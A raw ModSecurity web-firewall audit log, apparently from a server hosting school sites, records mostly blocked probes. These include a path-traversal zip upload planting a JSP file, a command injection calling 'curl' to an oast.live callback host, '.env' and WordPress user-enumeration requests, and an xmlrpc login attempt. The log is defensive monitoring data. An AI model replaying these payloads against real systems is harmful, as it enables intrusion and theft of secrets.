"ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748483563811748 4553 (- - -) Stopwatch2: 1748483563811748 4553; combined=3356, p1=370, p2=2957, p3=0, p4=0, p5=28, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090b6b1a-Z-- --b9db305a-A-- [29/May/2025:08:55:34 +0700] aDe-lsX5pbyFXv2T3ipgcgAAAMU 103.236.140.4 57062 103.236.140.4 8181 --b9db305a-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 165249989 --b9db305a-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --0dfdfb28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dfdfb28-E-- --0dfdfb28-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748488569808248 5661 (- - -) Stopwatch2: 1748488569808248 5661; combined=3768, p1=538, p2=3196, p3=0, p4=0, p5=34, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dfdfb28-Z-- --33c7ad13-A-- [29/May/2025:10:27:10 +0700] aDfUDmMaQtTb69S13pj7rQAAAEU 103.236.140.4 59096 103.236.140.4 8181 --33c7ad13-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 69.163.195.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 69.163.195.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --33c7ad13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33c7ad13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748489230672043 3353 (- - -) Stopwatch2: 1748489230672043 3353; combined=1501, p1=516, p2=952, p3=0, p4=0, p5=32, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33c7ad13-Z-- --ebf9fa4e-A-- [29/May/2025:10:28:28 +0700] aDfUXGMaQtTb69S13pj7tAAAAEs 103.236.140.4 59116 103.236.140.4 8181 --ebf9fa4e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.6.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.6.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ebf9fa4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebf9fa4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748489308029918 3013 (- - -) Stopwatch2: 1748489308029918 3013; combined=1318, p1=458, p2=831, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebf9fa4e-Z-- --7004996d-A-- [29/May/2025:10:35:54 +0700] aDfWGmMaQtTb69S13pj7ywAAAEY 103.236.140.4 59216 103.236.140.4 8181 --7004996d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 68.183.199.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 68.183.199.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7004996d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7004996d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748489754408903 877 (- - -) Stopwatch2: 1748489754408903 877; combined=380, p1=335, p2=0, p3=0, p4=0, p5=45, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7004996d-Z-- --4d175928-A-- [29/May/2025:10:55:33 +0700] aDfatX1Ye2lUDKzW1LvN8QAAAAE 103.236.140.4 59436 103.236.140.4 8181 --4d175928-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/118.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166791044 --4d175928-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0rjil9gpeoh536h8tf0zpi9h943u13ub.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --4d175928-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d175928-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748490933954929 2516 (- - -) Stopwatch2: 1748490933954929 2516; combined=1678, p1=341, p2=1273, p3=21, p4=22, p5=20, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d175928-Z-- --e7b5a331-A-- [29/May/2025:11:12:33 +0700] aDfescX5pbyFXv2T3iphLwAAANI 103.236.140.4 59536 103.236.140.4 8181 --e7b5a331-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.223.229.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.223.229.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e7b5a331-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7b5a331-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748491953859902 2801 (- - -) Stopwatch2: 1748491953859902 2801; combined=1255, p1=449, p2=776, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7b5a331-Z-- --fb27473c-A-- [29/May/2025:11:19:45 +0700] aDfgYWMaQtTb69S13pj73wAAAFQ 103.236.140.4 59860 103.236.140.4 8181 --fb27473c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.108.253.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.108.253.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fb27473c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb27473c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748492385231771 2975 (- - -) Stopwatch2: 1748492385231771 2975; combined=1305, p1=465, p2=801, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb27473c-Z-- --734fa158-A-- [29/May/2025:11:52:10 +0700] aDfn-mMaQtTb69S13pj8CQAAAEo 103.236.140.4 60220 103.236.140.4 8181 --734fa158-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.231.173.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.231.173.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --734fa158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --734fa158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748494330096074 3518 (- - -) Stopwatch2: 1748494330096074 3518; combined=1533, p1=505, p2=996, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --734fa158-Z-- --48e21026-A-- [29/May/2025:11:54:44 +0700] aDfolGMaQtTb69S13pj8DgAAAFI 103.236.140.4 60252 103.236.140.4 8181 --48e21026-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 31.10.62.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.10.62.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --48e21026-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48e21026-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748494484032512 2850 (- - -) Stopwatch2: 1748494484032512 2850; combined=1298, p1=429, p2=838, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48e21026-Z-- --d64ff47d-A-- [29/May/2025:12:00:34 +0700] aDfp8n1Ye2lUDKzW1LvOHwAAABA 103.236.140.4 60284 103.236.140.4 8181 --d64ff47d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 128.199.126.179 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 128.199.126.179 X-Forwarded-Proto: https Connection: close Content-Length: 498 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d64ff47d-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil!@#$%^&*() --d64ff47d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d64ff47d-E-- --d64ff47d-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748494834567378 6054 (- - -) Stopwatch2: 1748494834567378 6054; combined=4376, p1=473, p2=3749, p3=23, p4=25, p5=64, sr=78, sw=42, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d64ff47d-Z-- --77ff273a-A-- [29/May/2025:12:11:36 +0700] aDfsiP4vV4CoZ0MKLMPljAAAAIA 103.236.140.4 60404 103.236.140.4 8181 --77ff273a-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: w3m/0.5.1 Accept-Charset: utf-8 --77ff273a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77ff273a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748495496521244 800 (- - -) Stopwatch2: 1748495496521244 800; combined=327, p1=285, p2=0, p3=0, p4=0, p5=41, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77ff273a-Z-- --1d817b2c-A-- [29/May/2025:12:18:12 +0700] aDfuFP4vV4CoZ0MKLMPllgAAAI8 103.236.140.4 60448 103.236.140.4 8181 --1d817b2c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.101.134.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.101.134.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d817b2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d817b2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748495892652301 2867 (- - -) Stopwatch2: 1748495892652301 2867; combined=1245, p1=426, p2=788, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d817b2c-Z-- --32e46126-A-- [29/May/2025:12:18:49 +0700] aDfuOf4vV4CoZ0MKLMPlmwAAAII 103.236.140.4 60460 103.236.140.4 8181 --32e46126-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 74.48.125.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.48.125.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --32e46126-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32e46126-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748495929527802 2946 (- - -) Stopwatch2: 1748495929527802 2946; combined=1372, p1=476, p2=863, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32e46126-Z-- --f677f010-A-- [29/May/2025:12:26:23 +0700] aDfv_2MaQtTb69S13pj8OwAAAEI 103.236.140.4 60598 103.236.140.4 8181 --f677f010-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 134.209.25.199 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 134.209.25.199 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f677f010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f677f010-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748496383775236 598 (- - -) Stopwatch2: 1748496383775236 598; combined=239, p1=217, p2=0, p3=0, p4=0, p5=21, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f677f010-Z-- --c3a79a28-A-- [29/May/2025:12:36:08 +0700] aDfySGMaQtTb69S13pj8UAAAAE4 103.236.140.4 60738 103.236.140.4 8181 --c3a79a28-B-- POST /userentry?accountId=/../../../tomcat/webapps/UsTFY/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 124 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165250602 --c3a79a28-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --c3a79a28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3a79a28-E-- --c3a79a28-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data 